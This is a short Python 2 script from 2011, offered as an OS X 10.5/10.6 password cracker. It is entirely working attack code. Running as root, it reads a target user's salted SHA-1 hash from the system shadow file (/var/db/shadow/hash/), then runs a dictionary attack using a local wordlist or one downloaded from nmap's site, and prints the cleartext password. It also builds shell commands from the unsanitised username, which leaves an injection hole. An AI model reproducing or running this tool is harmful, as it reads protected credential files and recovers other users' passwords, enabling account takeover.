OS X Password Cracker

1. #***************************************************
2. #***************************************************
3. #* Used for cracking OS X passwords on 10.5 and 10.6
4. #* Must have UID O!
5. #* Usage: osx_crack.py <username> [dictionary]
6. #*
7. #* Patrick Dunstan
8. #* http://www.defenceindepth.net
9. #* 2011
10. #***************************************************
11. #***************************************************
12.  
13. from subprocess import *
14. import hashlib
15. import os
16. import urllib2
17. import sys
18.  
19. link = "http://nmap.org/svn/nselib/data/passwords.lst" # ONLINE PASSWORD FILE
20.  
21. def check(password): # HASH PASS AND COMPARE
22.        
23.     if not password.startswith("#!"): #IGNORE COMMENTS
24.  
25.         create_sha1 = hashlib.sha1(salt_hex + password)
26.         sha1_guess = create_sha1.hexdigest()
27.         print("Trying... " + password)
28.    
29.         if sha1 in sha1_guess.upper():
30.             print("Cleartext password for user '"+username+"' is : "+password)
31.             exit(0)
32.  
33. if len(sys.argv) < 2:
34.     print("Usage: " + sys.argv[0] + " <username> [dictionary]")
35.     exit(0)
36.  
37. username = sys.argv[1]
38.  
39. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE) #PULL USER INFORMATION FROM DIRECTORY SERVICES
40. dscl_out = p.communicate()[0]
41.  
42. if "GeneratedUID" not in dscl_out:
43.     print("ERROR: User appears not to exist. Exiting.")
44.     exit(0)
45.  
46. list = dscl_out.split("\n")
47. guid = list[10].split(" ")
48.  
49. p = Popen("cat /var/db/shadow/hash/" + guid[1], shell=True, stdout=PIPE) #PULL HASH FROM SHADOW FILE
50. digest = p.communicate()[0]
51.  
52. salt = digest[168:176] # TAKE 4 BYTE SALT FROM FRONT
53. sha1 = digest[177:216] # TAKE REMAINING BYTES FOR HASH
54.  
55. print("Attempting to crack...  " + salt + sha1)
56.  
57. try:
58.     salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16)) # CONVERT SALT TO HEX
59.  
60. except ValueError:
61.     print("ERROR: Problem converting salt.")   
62.     exit(0)
63.  
64. if len(sys.argv) == 3: # IF DICTIONARY FILE SPECIFIED
65.     print("Reading from dictionary file '"+sys.argv[2]+"'.")
66.     passlist = open(sys.argv[2], "r")
67.     password = passlist.readline()
68.  
69.     while password:
70.         check(password.rstrip())
71.         password = passlist.readline()
72.     passlist.close()
73.  
74. else: # NO DICTIONARY FILE SPECIFIED
75.     print("No dictionary file specified. Defaulting to hard coded link.")
76.     passlist = urllib2.urlopen(link) # DOWNLOAD DICTIONARY FILE
77.     passwords = passlist.read().split("\n")
78.  
79.     for password in passwords:
80.         check(password)
81.  
82.  
83. print("\nPassword not found. Try a different dictionary :)")